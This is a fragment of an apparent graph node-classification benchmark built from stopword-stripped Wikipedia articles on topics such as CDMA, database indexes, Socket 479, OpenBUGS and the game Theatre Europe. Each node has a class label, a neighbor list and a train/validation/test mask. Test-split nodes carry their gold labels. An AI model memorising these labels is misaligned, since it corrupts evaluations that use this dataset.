    "text": "IFIS_Publishing:ifis publishing ifis academic publishing company not-for-profit organisation operating sciences regulations food health based reading ifis produces online bibliographic databases fsta resource company offered since 1969 along escalex launched 2017 fsta food science technology abstracts includes 1.4 million scientific non-predatory records trusted sources related disciplines surrounding food beverages ifis also produces association wiley blackwell dictionary food science technology second edition not-for-profit charitable organisation ifis offers access researchers developing countries research4life programmes hinari agora escalex created collaboration molecular connections launched april 2017 allows search retrieval food beverage food law information various geographies across globe originally known international food information service ifis established 1968 collaboration four organisations company originally based lane end house shinfield though recently moved granary bridge farm arborfield fsta bibliographic abstracting indexing database scientific technological information relating food beverages nutrition contains 1.3 million indexed records full-text links available covering 5,475 active historical journals books trade publications reviews conference proceedings reports patents standards database updated weekly records indexed ifis thesaurus containing 12,346 food science keywords curated structured hierarchies resource used researchers industry practitioners students contains information sources 29 languages sourced publishers 60 countries coverage includes major commodities food beverage industry related applied pure sciences pet foods food psychology food economics food safety fsta accessed ebscohost ovid proquest dialog stn web science",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 2454,
    "label": 2,
    "text": "Music_Kit:music kit music kit software package next computer system first developed david a. jaffe julius o. smith supported motorola 56001 dsp included next computer motherboard also first architecture unify music-n midi paradigms thus combined generality former interactivity performance capabilities latter music kit integrated sound kit first demonstrated 1988 davies symphony hall 1.0 release shipped 1989 next computer included objective-c library creating music sound applications score language included expression evaluation midi sound dsp drivers several command-line utilities simple score-playing application called scoreplayer music kit integrated variety music applications including finale creation station also used video games even document processors 2.0 release next computer included additional bundled applications including ensemble fractal-based improvisation tool developed michael mcnabb others involved next music kit project included douglas fulton documentation demos doug keislar third-party support greg kellogg drivers lee boynton drivers sound kit dana massie development addition consultants brought early included andy moorer dsp software architecture roger dannenberg data structures john strawn dsp software 1992 next 3.0 release music kit un-bundled next software released copyrighted open source package stanford center computer research music acoustics ccrma julius o. smith professor stanford university hired david a. jaffe consultant continue develop music kit among additions time support airel quintprocessor five-dsp board nextcube support audio directly via dsp56001 serial port brought back next cube support nextstep use dsp processing using turtle beach dsp56001 card set eight motorola evaluation boards combined chassis prototype frankenstein platform used sondius program stanford office technology licensing develop physical models musical instruments addition jaffe hired third party add midi time code support music kit sondius group later spun independent company staccato systems inc. funding yamaha stanford university staccato systems inc. acquired analog devices 2000 recent ports music kit done leigh smith stephen brandon",
    "neighbors": [
      8761,
      7820,
      7806,
      10470
    ],
    "mask": "None"
  },
  {
    "node_id": 2455,
    "label": 3,
    "text": "Socket_479:socket 479 socket 479 mpga479m cpu socket intel pentium celeron mobile processors normally used laptops also used tualatin-m pentium iii processors official naming intel µfcpga µpga479m exist multiple electrically incompatible mechanically compatible processor families available pga packages using socket variants thereof even intel cpu specifications seem clear enough distinction instead use package/socket designations pga478 ppga478 1 sockets perhaps adding yet confusion pga-based cpus also available bga precisely µbga even µfcbga package 479 contacts balls populated cpu variants intel cpu specifications use designations bga479 pbga479 h-pbga479 however pointed designations denote rather cpu package socket bga variants use intended directly soldered mainboard e.g embedded system non-bga counterparts cpus use one mentioned sockets socket 479 socket 479 479 pin holes pentium processors pga package 479 pins plug zero insertion force socket 478 pins electrically connected b2 reserved depopulated micro-fcpga package although electrically mechanically similar socket 478 one pin less making impossible use pentium processor 478 board reason manufacturers like asus made drop-in boards e.g ct-479 allow use socket 479 processors chipsets employ socket pentium intel 855gm/gme/pm intel 915gm/gms/pm intel 855gme chipset supports pentium cpu intel 855gm chipset officially support 90 nm 2mb l2 cache dothan core models even though works works 400fsb 3rd party/user able overclock fsb 855gm/gme/pm support 533fsb dothan core difference 855gm chipset graphics core runs 200 mhz 855gme runs 250 mhz 2006 intel released successor socket 479 revised pinout core processor called socket m. socket placement one pin changed pentium version socket 479 socket processors physically fit socket 479 electrically incompatible versions socket479 except using ati north bridge rc415md socket supports 667 mt/s fsb intel 945pm/945gm chipsets",
    "neighbors": [
      3588,
      5901,
      5523,
      8855,
      3992,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      2525,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      3317,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 2456,
    "label": 1,
    "text": "Database_index:database index database index data structure improves speed data retrieval operations database table cost additional writes storage space maintain index data structure indexes used quickly locate data without search every row database table every time database table accessed indexes created using one columns database table providing basis rapid random lookups efficient access ordered records index copy selected columns data table searched efficiently also includes low-level disk block address direct link complete row data copied databases extend power indexing letting developers create indexes functions expressions example index could created upper last_name would store upper-case versions codice_1 field index another option sometimes supported use partial indices index entries created records satisfy conditional expression aspect flexibility permit indexing user-defined functions well expressions formed assortment built-in functions database software includes indexing technology enables sub-linear time lookup improve performance linear search inefficient large databases suppose database contains n data items one must retrieved based value one fields simple implementation retrieves examines item according test one matching item stop finds single item multiple matches must test everything means number operations worst case n linear time since databases may contain many objects since lookup common operation often desirable improve performance index data structure improves performance lookup many different used purpose complex design trade-offs involving lookup performance index size index-update performance many index designs exhibit logarithmic log n lookup performance applications possible achieve flat 1 performance indexes used police database constraints unique exclusion primary key foreign key index may declared unique creates implicit constraint underlying table database systems usually implicitly create index set columns declared primary key capable using already-existing index police constraint many database systems require referencing referenced sets columns foreign key constraint indexed thus improving performance inserts updates deletes tables participating constraint database systems support exclusion constraint ensures newly inserted updated record certain predicate holds record used implement unique constraint equality predicate complex constraints like ensuring overlapping time ranges intersecting geometry objects would stored table index supporting fast searching records satisfying predicate required police constraint data present arbitrary order logical ordering specified index data rows may spread throughout table regardless value indexed column expression non-clustered index tree contains index keys sorted order leaf level index containing pointer record page row number data page page-organized engines row offset file-organized engines non-clustered index one non-clustered index database table clustering alters data block certain distinct order match index resulting row data stored order therefore one clustered index created given database table clustered indices greatly increase overall speed retrieval usually data accessed sequentially reverse order clustered index range items selected since physical records sort order disk next row item sequence immediately last one fewer data block reads required primary feature clustered index therefore ordering physical data rows accordance index blocks point databases separate data index blocks separate files others put two completely different data blocks within physical file multiple databases multiple tables joined referred cluster confused clustered index described records tables sharing value cluster key shall stored together nearby data blocks may improve joins tables cluster key since matching records stored together less i/o required locate cluster configuration defines data layout tables parts cluster cluster keyed b-tree index hash table data block table record stored defined value cluster key order index definition defines columns important possible retrieve set row identifiers using first indexed column however possible efficient databases retrieve set row identifiers using second greater indexed column example imagine phone book organized city first last name first name given city easily extract list phone numbers city however phone book would tedious find phone numbers given last name would look within city section entries last name databases others ’ use index phone book example composite index created columns codice_2 search giving exact values three fields search time minimal—but provide values codice_3 codice_4 search uses codice_3 field retrieve matched records sequential lookup checks matching codice_4 improve performance one must ensure index created order search columns indexes useful many applications come limitations consider following sql statement codice_7 process statement without index database software must look last_name column every row table known full table scan index database simply follows b-tree data structure smith entry found much less computationally expensive full table scan consider sql statement codice_8 query would yield email address every customer whose email address ends wikipedia.org even email_address column indexed database must perform full index scan index built assumption words go left right wildcard beginning search-term database software unable use underlying b-tree data structure words where-clause sargable problem solved addition another index created codice_9 sql query like codice_10 puts wild-card right-most part query gro.aidepikiw index reverse email_address satisfy wildcard characters used sides search word wikipedia.org index available field used rather sequential search performed takes n time bitmap index special kind indexing stores bulk data bit arrays bitmaps answers queries performing bitwise logical operations bitmaps commonly used indexes b+ trees efficient values index repeat repeat small number times contrast bitmap index designed cases values variable repeat frequently example sex field customer database usually contains three distinct values male female unknown recorded variables bitmap index significant performance advantage commonly used trees dense index databases file pairs keys pointers every record data file every key file associated particular pointer record sorted data file clustered indices duplicate keys dense index points first record key sparse index databases file pairs keys pointers every block data file every key file associated particular pointer block sorted data file clustered indices duplicate keys sparse index points lowest search key block reverse-key index reverses key value entering index e.g. value 24538 becomes 83542 index reversing key value particularly useful indexing data sequence numbers new key values monotonically increase primary index contains key fields table pointer non-key fields table primary index created automatically table created database create file must specify two things primary index 1 name primary index 2 primary index specification used index field neither ordering fields key fields assurance file organized key field primary key field one index entry every tuple data file dense index contains value indexed attribute pointer block/record indices implemented using variety data structures popular indices include balanced trees b+ trees hashes microsoft sql server leaf node clustered index corresponds actual data simply pointer data resides elsewhere case non-clustered index relation single clustered index many unclustered indices index typically accessed concurrently several transactions processes thus needs concurrency control principle indexes utilize common database concurrency control methods specialized concurrency control methods indexes exist applied conjunction common methods substantial performance gain cases index used quickly locate data record required data read words index used locate data records table return data covering index special case index contains required data field answer required data consider following table fields omitted find name id 13 index id useful record must still read get name however index id name contains required data field eliminates need look record covering indexes specific table queries join/ access across multiple tables may potentially consider covering indexes one tables covering index dramatically speed data retrieval may large due additional keys slow data insertion update reduce index size systems allow including non-key fields index non-key fields part index ordering included leaf level allowing covering index less overall index size standard defines create indexes iso sql standard cover physical aspects indexes one physical parts database conception among others like storage tablespace filegroups rdbms vendors give create index syntax specific options depend software capabilities",
    "neighbors": [
      8195,
      7175,
      8201,
      9225,
      2068,
      1049,
      5658,
      3103,
      9248,
      10793,
      10286,
      11324,
      9286,
      2632,
      9290,
      8788,
      10326,
      7767,
      9828,
      10340,
      8808,
      2669,
      1136,
      5745,
      1142,
      1146,
      3196,
      10367,
      11402,
      9360,
      10389,
      4255,
      4263,
      10413,
      9397,
      7868,
      11457,
      6850,
      2757,
      1222,
      2246,
      6346,
      4811,
      11472,
      10459,
      2780,
      734,
      736,
      10471,
      6383,
      755,
      7412,
      8440,
      8979,
      7446,
      11030,
      5401,
      5403,
      7453,
      11552,
      2339,
      7461,
      2344,
      1341,
      10048,
      2369,
      5953,
      6470,
      333,
      337,
      2901,
      10069,
      864,
      7523,
      7022,
      9075,
      888,
      2432,
      10632,
      3990,
      9112,
      10137,
      9631,
      9634,
      1447,
      7080,
      11189,
      5048,
      5560,
      5051,
      3004,
      7627,
      3533,
      2011,
      987,
      4065,
      3045,
      6124,
      2544,
      10737,
      4598
    ],
    "mask": "Test"
  },
  {
    "node_id": 2457,
    "label": 9,
    "text": "OpenBUGS:openbugs openbugs software application bayesian analysis complex statistical models using markov chain monte carlo mcmc methods openbugs open source variant winbugs bayesian inference using gibbs sampling runs microsoft windows linux well inside r statistical package versions v3.0.7 onwards designed least efficient reliable winbugs range test applications addition different licence greater range operating systems fundamental difference openbugs winbugs way expert system selects updating algorithm use class full conditional distribution node winbugs defines one algorithm possible class limit number algorithms openbugs use allowing greater flexibility extensibility user select updater used node compilation differences detailed openbugs website source code openbugs written component pascal programming language dependent component pascal libraries provided oberon microsystems part blackbox component framework development tools available open source binaries current version openbugs available microsoft windows previous version linux also run wine linux installation problems development usage questions discussed openbugs bulletin board attempts port openbugs java gardens point component pascal given favor new portable implementation called jags bugs language language specifies model code parsed openbugs creates executable compiled code generates sample posterior distribution run openbugs designed run together s-plus bugs language similar programming language openbugs works well together r r2openbugs brugs packages provides interoperability r modules help analyses",
    "neighbors": [
      5380,
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      5399,
      7580,
      7326,
      5677,
      7983,
      6962,
      823,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      8262,
      2000,
      9944,
      2652,
      1632,
      10848,
      872,
      4840,
      363,
      5612,
      2804,
      5492,
      7924
    ],
    "mask": "Train"
  },
  {
    "node_id": 2458,
    "label": 5,
    "text": "Code-division_multiple_access:code-division multiple access code-division multiple access cdma channel access method used various radio communication technologies cdma example multiple access several transmitters send information simultaneously single communication channel allows several users share band frequencies see bandwidth permit without undue interference users cdma employs spread spectrum technology special coding scheme transmitter assigned code cdma used access method many mobile phone standards is-95 also called cdmaone 3g evolution cdma2000 often simply referred cdma umts 3g standard used gsm carriers also uses wideband cdma w-cdma well td-cdma td-scdma radio technologies technology code-division multiple access channels long known soviet union ussr first work devoted subject published 1935 dmitry ageev shown use linear methods three types signal separation frequency time compensatory technology cdma used 1957 young military radio engineer leonid kupriyanovich moscow made experimental model wearable automatic mobile phone called lk-1 base station lk-1 weight 3 kg 20–30 km operating distance 20–30 hours battery life base station described author could serve several customers 1958 kupriyanovich made new experimental pocket model mobile phone phone weighed 0.5 kg serve customers kupriyanovich proposed device called correlator 1958 ussr also started development altai national civil mobile phone service cars based soviet mrt-1327 standard phone system weighed placed trunk vehicles high-ranking officials used standard handset passenger compartment main developers altai system vniis voronezh science research institute communications gspi state specialized project institute 1963 service started moscow 1970 altai service used 30 ussr cities cdma spread-spectrum multiple-access technique spread-spectrum technique spreads bandwidth data uniformly transmitted power spreading code pseudo-random code narrow ambiguity function unlike narrow pulse codes cdma locally generated code runs much higher rate data transmitted data transmission combined bitwise xor exclusive faster code figure shows spread-spectrum signal generated data signal pulse duration formula_1 symbol period xored code signal pulse duration formula_2 chip period note bandwidth proportional formula_3 formula_4 bit time therefore bandwidth data signal formula_5 bandwidth spread spectrum signal formula_6 since formula_2 much smaller formula_1 bandwidth spread-spectrum signal much larger bandwidth original signal ratio formula_9 called spreading factor processing gain determines certain extent upper limit total number users supported simultaneously base station user cdma system uses different code modulate signal choosing codes used modulate signal important performance cdma systems best performance occurs good separation signal desired user signals users separation signals made correlating received signal locally generated code desired user signal matches desired user code correlation function high system extract signal desired user code nothing common signal correlation close zero possible thus eliminating signal referred cross-correlation code correlated signal time offset zero correlation close zero possible referred auto-correlation used reject multi-path interference analogy problem multiple access room channel people wish talk simultaneously avoid confusion people could take turns speaking time division speak different pitches frequency division speak different languages code division cdma analogous last example people speaking language understand languages perceived noise rejected similarly radio cdma group users given shared code many codes occupy channel users associated particular code communicate general cdma belongs two basic categories synchronous orthogonal codes asynchronous pseudorandom codes digital modulation method analogous used simple radio transceivers analog case low-frequency data signal time-multiplied high-frequency pure sine-wave carrier transmitted effectively frequency convolution wiener–khinchin theorem two signals resulting carrier narrow sidebands digital case sinusoidal carrier replaced walsh functions binary square waves form complete orthonormal set data signal also binary time multiplication achieved simple xor function usually gilbert cell mixer circuitry synchronous cdma exploits mathematical properties orthogonality vectors representing data strings example binary string 1011 represented vector 1 0 1 1 vectors multiplied taking dot product summing products respective components example u b v c dot product u·v ac bd dot product zero two vectors said orthogonal properties dot product aid understanding w-cdma works vectors b orthogonal formula_10 user synchronous cdma uses code orthogonal others codes modulate signal example 4 mutually orthogonal digital signals shown figure orthogonal codes cross-correlation equal zero words interfere case is-95 64-bit walsh codes used encode signal separate different users since 64 walsh codes orthogonal signals channelized 64 orthogonal signals following example demonstrates user signal encoded decoded start set vectors mutually orthogonal although mutual orthogonality condition vectors usually constructed ease decoding example columns rows walsh matrices example orthogonal functions shown adjacent picture vectors assigned individual users called code chip code chipping code interest brevity rest example uses codes v two bits user associated different code say v. 1 bit represented transmitting positive code v 0 bit represented negative code −v example v v v 1 −1 data user wishes transmit 1 0 1 1 transmitted symbols would purposes article call constructed vector transmitted vector sender different unique vector v chosen set construction method transmitted vector identical due physical properties interference two signals point phase add give twice amplitude signal phase subtract give signal difference amplitudes digitally behaviour modelled addition transmission vectors component component sender0 code 1 −1 data 1 0 1 1 sender1 code 1 1 data 0 0 1 1 senders transmit simultaneously table describes coding steps signal0 signal1 transmitted time air add produce raw signal raw signal called interference pattern receiver extracts intelligible signal known sender combining sender code interference pattern following table explains works shows signals interfere one another decoding values greater 0 interpreted 1 values less zero interpreted 0 example decoding data0 2 −2 2 2 receiver interprets 1 0 1 1 values exactly 0 means sender transmit data following example assume signal0 1 −1 −1 1 1 −1 1 −1 transmitted alone following table shows decode receiver receiver attempts decode signal using sender1 code data zeros therefore cross-correlation equal zero clear sender1 transmit data mobile-to-base links precisely coordinated particularly due mobility handsets different approach required since mathematically possible create signature sequences orthogonal arbitrarily random starting points make full use code space unique pseudo-random pseudo-noise pn sequences used asynchronous cdma systems pn code binary sequence appears random reproduced deterministic manner intended receivers pn codes used encode decode user signal asynchronous cdma manner orthogonal codes synchronous cdma shown example pn sequences statistically uncorrelated sum large number pn sequences results multiple access interference mai approximated gaussian noise process following central limit theorem statistics gold codes example pn suitable purpose low correlation codes users received power level variance e.g. noise power mai increases direct proportion number users words unlike synchronous cdma signals users appear noise signal interest interfere slightly desired signal proportion number users forms cdma use spread-spectrum process gain allow receivers partially discriminate unwanted signals signals encoded specified pn sequence code received signals different codes code different timing offset appear wideband noise reduced process gain since user generates mai controlling signal strength important issue cdma transmitters cdm synchronous cdma tdma fdma receiver theory completely reject arbitrarily strong signals using different codes time slots frequency channels due orthogonality systems true asynchronous cdma rejection unwanted signals partial unwanted signals much stronger desired signal overwhelm leads general requirement asynchronous cdma system approximately match various signal power levels seen receiver cdma cellular base station uses fast closed-loop power-control scheme tightly control mobile transmit power theory cdma tdma fdma exactly spectral efficiency practice challenges – power control case cdma timing case tdma frequency generation/filtering case fdma tdma systems must carefully synchronize transmission times users ensure received correct time slot cause interference since perfectly controlled mobile environment time slot must guard time reduces probability users interfere decreases spectral efficiency similarly fdma systems must use guard band adjacent channels due unpredictable doppler shift signal spectrum user mobility guard bands reduce probability adjacent channels interfere decrease utilization spectrum asynchronous cdma offers key advantage flexible allocation resources i.e allocation pn codes active users case cdm synchronous cdma tdma fdma number simultaneous orthogonal codes time slots frequency slots respectively fixed hence capacity terms number simultaneous users limited fixed number orthogonal codes time slots frequency bands allocated cdm tdma fdma systems remain underutilized due bursty nature telephony packetized data transmissions strict limit number users supported asynchronous cdma system practical limit governed desired bit error probability since sir signal-to-interference ratio varies inversely number users bursty traffic environment like mobile telephony advantage afforded asynchronous cdma performance bit error rate allowed fluctuate randomly average value determined number users times percentage utilization suppose 2 n users talk half time 2 n users accommodated average bit error probability n users talk time key difference bit error probability n users talking time constant whereas random quantity mean 2 n users talking half time words asynchronous cdma ideally suited mobile network large numbers transmitters generate relatively small amount traffic irregular intervals cdm synchronous cdma tdma fdma systems recover underutilized resources inherent bursty traffic due fixed number orthogonal codes time slots frequency channels assigned individual transmitters instance n time slots tdma system 2 n users talk half time half time n users needing use n time slots furthermore would require significant overhead continually allocate deallocate orthogonal-code time-slot frequency-channel resources comparison asynchronous cdma transmitters simply send something say go air n't keeping pn signature sequence long connected system modulation schemes try minimize bandwidth signal since bandwidth limited resource however spread-spectrum techniques use transmission bandwidth several orders magnitude greater minimum required signal bandwidth one initial reasons military applications including guidance communication systems systems designed using spread spectrum security resistance jamming asynchronous cdma level privacy built signal spread using pseudo-random code code makes spread-spectrum signals appear random noise-like properties receiver demodulate transmission without knowledge pseudo-random sequence used encode data cdma also resistant jamming jamming signal finite amount power available jam signal jammer either spread energy entire bandwidth signal jam part entire signal cdma also effectively reject narrow-band interference since narrow-band interference affects small portion spread-spectrum signal easily removed notch filtering without much loss information convolution encoding interleaving used assist recovering lost data cdma signals also resistant multipath fading since spread-spectrum signal occupies large bandwidth small portion undergo fading due multipath given time like narrow-band interference result small loss data overcome another reason cdma resistant multipath interference delayed versions transmitted pseudo-random codes poor correlation original pseudo-random code thus appear another user ignored receiver words long multipath channel induces least one chip delay multipath signals arrive receiver shifted time least one chip intended signal correlation properties pseudo-random codes slight delay causes multipath appear uncorrelated intended signal thus ignored cdma devices use rake receiver exploits multipath delay components improve performance system rake receiver combines information several correlators one tuned different path delay producing stronger version signal simple receiver single correlation tuned path delay strongest signal frequency reuse ability reuse radio channel frequency cell sites within cellular system fdma tdma systems frequency planning important consideration frequencies used different cells must planned carefully ensure signals different cells interfere cdma system frequency used every cell channelization done using pseudo-random codes reusing frequency every cell eliminates need frequency planning cdma system however planning different pseudo-random sequences must done ensure received signal one cell correlate signal nearby cell since adjacent cells use frequencies cdma systems ability perform soft hand-offs soft hand-offs allow mobile telephone communicate simultaneously two cells best signal quality selected hand-off complete different hard hand-offs utilized cellular systems hard-hand-off situation mobile telephone approaches hand-off signal strength may vary abruptly contrast cdma systems use soft hand-off undetectable provides reliable higher-quality signal recent study novel collaborative multi-user transmission detection scheme called collaborative cdma investigated uplink exploits differences users fading channel signatures increase user capacity well beyond spreading length mai-limited environment authors show possible achieve increase low complexity high bit error rate performance flat fading channels major research challenge overloaded cdma systems approach instead using one sequence per user conventional cdma authors group small number users share spreading sequence enable group spreading despreading operations new collaborative multi-user receiver consists two stages group multi-user detection mud stage suppress mai groups low-complexity maximum-likelihood detection stage recover jointly co-spread users data using minimal euclidean-distance measure users channel-gain coefficients note research area going 2004 prof. li ping introduced new concept enhanced cdma version known interleave division multiple access idma scheme uses orthogonal interleaved means user separation place signature sequence used cdma system many researchers introduced various orthogonal interleaving mechanisms including tree based interleaved suggested prof. manoj kumar shukla harcourt butler technical university",
    "neighbors": [
      10112,
      4609,
      2306,
      388,
      8708,
      3847,
      9863,
      2057,
      1550,
      11288,
      5020,
      4256,
      5664,
      1192,
      11560,
      7723,
      11181,
      1969,
      2994,
      1083,
      448,
      7490,
      3140,
      7108,
      9284,
      11591,
      5321,
      7498,
      9038,
      9296,
      119,
      2911,
      3168,
      1121,
      2785,
      4068,
      5092,
      5863,
      7400,
      1650,
      2802,
      3959
    ],
    "mask": "None"
  },
  {
    "node_id": 2459,
    "label": 8,
    "text": "80legs:80legs 80legs web crawling service allows users create run web crawls software service platform 80legs created computational crawling company houston tx company launched private beta 80legs april 2009 publicly launched service demofall 09 conference time public launch 80legs offered customized web crawling scraping services since added subscription plans product offerings 80legs built top distributed grid computing network grid consists approximately 50,000 individual computers distributed across world uses bandwidth monitoring technology prevent bandwidth cap overages 80legs criticised numerous site owners technology effectively acting distributed denial service attack obeying robots.txt average webmaster aware existence 80legs blocking access crawler done already late server ddosed guilty party detected time-consuming in-depth analysis logfiles rulesets modsecurity like one atomicorp block access webserver 80legs order prevent ddos webknight also blocks 80legs default distributed crawler impossible block crawler ip best way found block 80legs useragent 008 wrecksite blocks 80legs default",
    "neighbors": [
      3744,
      8769,
      3875,
      5956,
      2566,
      6374,
      4473,
      714,
      2318,
      944,
      113,
      467,
      11284,
      1240,
      1913,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2460,
    "label": 3,
    "text": "Theatre_Europe:theatre europe theatre europe turn-based strategy video game developed published personal software services first released united kingdom commodore 64 zx spectrum amstrad cpc atari 8-bit home computers 1985 later released france ere informatique 1986 released united states datasoft later year also ported tatung einstein home computer 1989 exclusively united kingdom fifth instalment strategic wargames series game set fictional war europe nato warsaw pact sides use nuclear chemical weapons main objective game fight conventional battles continental europe whilst trying avoid worldwide nuclear holocaust throughout game various capital cities civilian populations destroyed nuclear weapons game end either side forced surrender entire population europe perishes order request nuclear strike player required call dedicated telephone number led automated message announcing authorisation code development developers obtained extensive information statistics military strength ministry defence soviet embassy london theatre europe gained national controversy upon release receiving criticism campaign nuclear disarmament cnd sun newspaper high street retail chains refused sell game upon release despite controversy game received critical acclaim reviewers praise directed accuracy playability value money best strategy game award 1985 golden joystick awards nominated game year title game turn-based strategy revolves around fictional conflict powers nato allies warsaw pact player choice choosing either nato warsaw pact collectively referred soviet forces demo computer versus computer option game plays game takes place period 30 in-game days one day equal one round three types difficulty level one unless provoked enemy use nuclear weapons whilst levels two three enable enemy use nuclear chemical attacks prevent player winning game main feature game focused map europe western russia displays accurate terrain mountain ranges major cities borders military forces belonging side game also features arcade sequence involves shooting enemy units order secure combat bonuses gameplay mode however ignored changing game settings arcade sequences turned player notified choose battle map depending area chosen illustration battle commencing countryside city presented various forms military equipment including aeroplanes helicopters tanks player must shoot destroy enemy units using cursor similar style missile command outcome arcade sequence affect game performing poorly result severe losses throughout round combat resolved player must move assemble forces continental europe known movement phase two special units exclusively available warsaw pact 1st airborne army flown directly behind enemy lines 1st amphibious army move sea tactical attack point units moved cursor one may moved time units moved within round attack phase begin amount friendly units may attack opposing army however unit dispatched battle stopped current attack phase concludes attacking phase separate screen displaying combat information enemy numbers casualties displayed screen detailing attacking phase turned settings battle instead decided warrants air superiority armaments battle sequences player opportunity rebuild units allocating quantity armament supplies air support issued friendly unit map rebuilding ground units game move onto air phase consists commanding aircraft aeroplanes bombers limited number reserve air units several options allocating air forces include counter air strikes reconnaissance enemy movement interdiction assault breakers deep strikes counter air strikes involve attacks enemy air bases whereas interdiction involves aircraft sent behind enemy lines order attack supply movement networks interdiction aircraft discovered enemy territory chance side respond retaliatory nuclear strike remaining three aircraft options attack single unit strike enemy territory attack railways order disable enemy reinforcements respectively game allows player request chemical nuclear tactical strikes enemy chemical attack automatically targeted enemy capital city conclude readout announcing outcome attack civilian casualties order launch strategic nuclear attack player given 30 seconds call dedicated 1-800 telephone number obtain special authorisation code automated answerphone message authorisation code 'midnight sun authorisation code received player given three separate options proceed standby mode postpone nuclear launch whereas strategic launch involve one nuclear warhead targeting city third option known fire-plan issue full-scale nuclear strike across europe may result nuclear holocaust end game personal software services founded coventry west midlands gary mays richard cockayne 1981 company known creating games revolved around historic battles conflicts battle britain bismarck falklands '82 company partnership french video game developer ere informatique published localised versions products united kingdom 1986 cockayne took decision alter products release 16-bit consoles found smaller 8-bit consoles zx spectrum lacked processing power larger strategy games decision falsely interpreted pulling spectrum market video game journalist phillipa irving following years successful sales throughout mid-1980s personal software services experienced financial difficulties cockayne admitted retrospective interview took eye ball company acquired mirrorsoft february 1987 later dispossessed company due strains debt interview computer magazine richard cockayne stated theatre europe received heavy criticism campaign nuclear disarmament cnd sun newspaper respectively cnd accused developers bad taste despite cockayne claiming organisation never looked product development game cockayne mays obtained figures statistics various military strength ministry defence soviet embassy london cockayne asserted statistics developers gained realistically plausible stating would let horrifying results speak game game designer alan steel stated testing alarmed discover computer played warsaw pact always conventional war overwhelmingly forcing nato either surrender begin nuclear war steel adjusted game give nato chance win theatre europe first released united kingdom commodore 64 zx spectrum amstrad cpc atari 8-bit home computers 1985 re-released france united states consoles 1986 due lobbying cnd high street outlets boots john menzies refused sell game stores former finding morally offensive game received critical acclaim upon release gwyn hughes sinclair defended accuracy morality game stating bad taste game well researched program thought would give player insight nature modern war philippa irving crash similarly stated theatre europe offered usual run-of-the-mill war game heralded simplistic nature adding novice gamers would get ease john gilbert sinclair user added scepticism developer intention making something serious opposed titles however praised game brilliant chilling simulation reviewer writing zx computing similarly stated game superbly chilling extremely well-presented reviewer computer video games criticised inferior graphics zx spectrum stating bit flawed comparison commodore 64 version mark reed computer gamer noted game attracted media attention despite objective game discouraging use nuclear weapons reed praised presentation gameplay also stating use joystick keyboard excellent reviewer zzap 64 heralded presentation value money stating overall special indeed reviewer also gave praise sound suggesting game featured one best pieces micro music ever antic stated atari 8-bit version execution uneven magazine reported arcade portion quickly becomes nuisance nato could defeat warsaw pact lack balance flaws exist commodore 64 version peter connor advanced computer entertainment said theatre europe gift regards value money level playability 1994 survey wargames computer gaming world gave title two-plus stars five stating rendered obsolete history game play game best strategy game award 1985 golden joystick awards also nominated game year title",
    "neighbors": [
      7536,
      885,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2461,
    "label": 4,
    "text": "Trustworthy_computing:trustworthy computing term trustworthy computing twc applied computing systems inherently secure available reliable particularly associated microsoft initiative name launched 2002 1995 restrictions commercial traffic internet may 26 1995 bill gates sent internet tidal wave memorandum microsoft executives assigning ... internet highest level importance ... microsoft windows 95 released without web browser microsoft yet developed one success web caught surprise mid 1995 testing web server august 24 1995 launched major online service msn national research council recognized rise internet simultaneously increased societal reliance computer systems increasing vulnerability systems failure produced important report 1999 trust cyberspace report reviews cost un-trustworthy systems identifies actions required improvement bill gates launched microsoft trustworthy computing initiative january 15 2002 memo referencing internal whitepaper microsoft cto senior vice president craig mundie move reportedly prompted fact ... fire larger customers–government agencies financial companies others–about security problems windows issues brought front center series self-replicating worms embarrassing attacks code red nimda klez four areas identified initiative ’ key areas security privacy reliability business integrity despite initial scepticism 10-year anniversary generally accepted ... made positive impact industry ... ..",
    "neighbors": [
      6520,
      2067,
      3852,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2462,
    "label": 3,
    "text": "EComStation:ecomstation ecomstation ecs pc operating system based os/2 published serenity systems mensys bv currently owned developed xeu.com includes several additions accompanying software present ibm version system ecomstation 32-bit operating system runs exclusively x86 processor architecture real virtualized still used version 1 ecomstation released 2001 based around integrated os/2 version 4.5 client convenience package os/2 warp version 4 released ibm 2000 latter made available holders existing os/2 support contracts included following new features among others compared final retail version os/2 1996 os/2 warp version 4 ecomstation provided retail channel end users obtain updates addition beginning bundled number additional features enhancements including limited ibm began wind os/2 development serenity partners began take slack combination in-house contract community/open source development efforts terms keeping operating system usable current hardware results many efforts included version 2 ecomstation among others became clear ibm would release new retail version os/2 warp client operating system version 4 1996 users began consider alternatives ibm released final version server edition ibm os/2 warp server e-business wseb internally called version 4.5 ibm also continued updating client merged parts server proposed bob st. john serenity systems oem company could create client using existing os/2 client ibm enhancements adding improvements needed serenity ibm business partner done similar thing os/2-based vertical applications like serenity managed client rapid deployment os based workspace on-demand ecomstation server managed server based wseb os/2 software vendor stardock made proposal ibm 1999 followed company april 29 2000 serenity conjunction kim cheung touchvoice systems created discussion group purpose discussing os/2 community interest new managed client ebusiness using components wseb called ecomstation replace one based wod idea brought also create new non-remote boot client — effect oem version os/2 client although serenity initial response suggestion thick client negative response positive enough community ibm get things moving months later first ecs preview shipped notwithstanding cheung fairly simple initial concept community input actively solicited beginning feature requests quickly began coming final ga release ecomstation 1.0 us english released july 2001 significantly different original preview many respects obviously ibm os/2 install routine longer used instead rapid-deployment system based cheung wisemanager product utilized install operating system components addition number enhancements os/2 user interface integrated including revamped desktop layout entirely new icons customizable graphic effects number windowing components redesigned system dialogs enhanced user-extensible system shutdown ecomstation 1.0 built 2000 release ibm convenience package os/2 warp version 4 commonly referred mcp mcp1 additionally several commercial applications bundled operating system package notably lotus smartsuite os/2 ibm desktop on-call english edition released efforts turned making language editions called national language versions nlvs available however first non-english nlv targeted german released end 2001 due large part greater-than-anticipated effort localizing redesigned installer new materials ultimately non-english nlvs released ecomstation 1.0 languages would become available ecomstation 1.1 